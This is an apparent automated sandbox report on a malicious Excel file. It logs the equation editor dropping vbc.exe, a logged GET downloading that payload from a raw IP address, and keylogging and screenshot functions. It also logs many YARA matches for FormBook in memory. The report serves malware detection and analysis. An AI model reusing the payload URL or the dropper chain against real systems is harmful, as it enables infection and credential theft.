Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91A998F7.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: C:\Users\Public\vbc.exe Code function: 4_2_003E3A78 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 4_2_003E3A78
Source: global traffic HTTP traffic detected: GET /1100/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.136.201Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: unknown TCP traffic detected without corresponding DNS query: 198.46.136.201
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\Public\vbc.exe Code function: 4_2_00433B64 GetKeyboardState, 4_2_00433B64
Contains functionality to record screenshots
Source: C:\Users\Public\vbc.exe Code function: 4_2_00425A40 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 4_2_00425A40

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Detected potential crypto function
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 0_2_02E966E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966F3 0_2_02E966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96340 0_2_02E96340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96743 0_2_02E96743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96753 0_2_02E96753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E9CF01 0_2_02E9CF01
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044629C 4_2_0044629C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044B47C 4_2_0044B47C
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F6818 4_2_042F6818
Source: C:\Users\Public\vbc.exe Code function: 4_2_04305898 4_2_04305898
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_7249BA51 6_2_7249BA51
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72481030 6_2_72481030
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_7249C90C 6_2_7249C90C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72482FB0 6_2_72482FB0
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72488C6C 6_2_72488C6C
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72488C70 6_2_72488C70
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_7249C43E 6_2_7249C43E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_72482D90 6_2_72482D90
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02121238 6_2_02121238
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207E2E9 6_2_0207E2E9
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02082305 6_2_02082305
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02087353 6_2_02087353
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020CA37B 6_2_020CA37B
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207F3CF 6_2_0207F3CF
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020A63DB 6_2_020A63DB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020AD005 6_2_020AD005
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02083040 6_2_02083040
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0209905A 6_2_0209905A
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0207E0C6 6_2_0207E0C6
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02122622 6_2_02122622
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02084680 6_2_02084680
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0208E6C1 6_2_0208E6C1
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_0210579A 6_2_0210579A
